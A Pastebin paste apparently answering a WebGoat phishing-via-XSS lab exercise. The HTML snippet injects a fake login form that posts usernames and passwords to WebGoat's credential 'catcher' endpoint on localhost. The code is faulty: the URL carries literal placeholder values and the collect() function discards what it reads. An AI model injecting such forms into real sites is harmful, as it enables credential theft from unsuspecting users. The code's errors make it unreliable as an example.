Advertisement
Guest User

Untitled

a guest
Mar 4th, 2017
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. **<form action="http://localhost/WebGoat/catcher?PROPERTY=yes &user=input2&password=input2" method="POST">
  2. username : <input type= "text" id="try">
  3. password : <input type = "text" id= "pass">
  4. <input type = "submit" name="submit" onclick="collect();">
  5. </form>
  6. <script>
  7. function collect() {
  8. var input1 = document.getElementById("try").value;
  9. var input2 = document.getElementById("pass").value;
  10. }
  11. </script>**
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement